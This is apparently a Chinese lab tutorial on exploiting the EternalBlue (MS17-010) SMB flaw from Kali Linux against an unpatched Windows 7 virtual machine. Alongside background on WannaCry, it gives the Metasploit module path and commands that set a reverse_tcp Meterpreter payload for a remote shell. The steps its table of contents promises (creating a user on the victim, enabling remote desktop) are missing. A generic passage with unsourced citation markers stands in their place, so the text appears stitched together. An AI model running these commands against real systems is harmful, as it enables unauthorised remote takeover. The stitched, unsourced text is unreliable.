利用kali Linux复现永恒之蓝(MS17-010)漏洞

目录

什么是永恒之蓝?

永恒之蓝漏洞原理

实验环境

操作前提

实验步骤

(1)复现成功后,执行截图命令

(2)对受害机器建立用户,并且开启受害机器的远程桌面并连接


什么是永恒之蓝?

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

永恒之蓝漏洞原理

永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

实验环境

1、未打补丁的存在永恒之蓝漏洞的Windows 7 机器作为受害机器(IP:192.168.239.130)

2、kali Linux机器作为实验的攻击

在进行永恒之蓝MS17-010漏洞实验时,选择合适的靶机镜像至关重要。该实验通常基于Windows系统,因为永恒之蓝漏洞主要影响的是Windows SMB服务。以下是一些推荐的靶机镜像资源和获取方式: ### 靶机镜像推荐 1. **Windows 7 SP1 x64/x86** Windows 7 SP1 是永恒之蓝漏洞复现中最常用的系统版本之一,因为它未默认安装补丁,且广泛存在于当时的环境中。可以在一些虚拟化平台或社区分享中找到未经修补的镜像[^1]。 2. **Windows Server 2008 R2 SP1** 另一个常见选择是 Windows Server 2008 R2 SP1,它同样存在该漏洞且适合企业级环境模拟测试。可以从微软官方评估中心下载试用版ISO文件,并通过虚拟机工具创建靶机[^3]。 3. **Metasploitable 2/3** 虽然 Metasploitable 主要用于教学和练习,但其某些版本也包含可被利用的SMB服务配置,适合初学者进行基础练习。可以从 SourceForge 获取 Metasploitable 2 的 VHD 或 OVA 文件[^4]。 4. **自定义靶机** 在 Kali Linux 上使用 `msfconsole` 进行漏洞测试时,也可以自行搭建靶机环境。例如,在 VirtualBox 或 VMware 中安装未打补丁的 Windows 系统,并关闭自动更新功能以确保漏洞依然存在[^3]。 ### 下载与配置建议 - **中科大Kali镜像源** 提供了完整的Kali Linux ISO镜像,适用于搭建攻击机环境。可以访问其镜像站获取最新版本: ``` deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib ``` 安装完成后,可通过 `apt update && apt install metasploit-framework` 安装 Metasploit Framework [^2]。 - 永恒之蓝模块在 Metasploit 中的路径为: ``` use exploit/windows/smb/ms17_010_eternalblue set RHOSTS <目标IP> set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST <本地监听IP> run ``` 成功利用后将获得 Meterpreter Shell,可用于进一步渗透操作[^4]。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值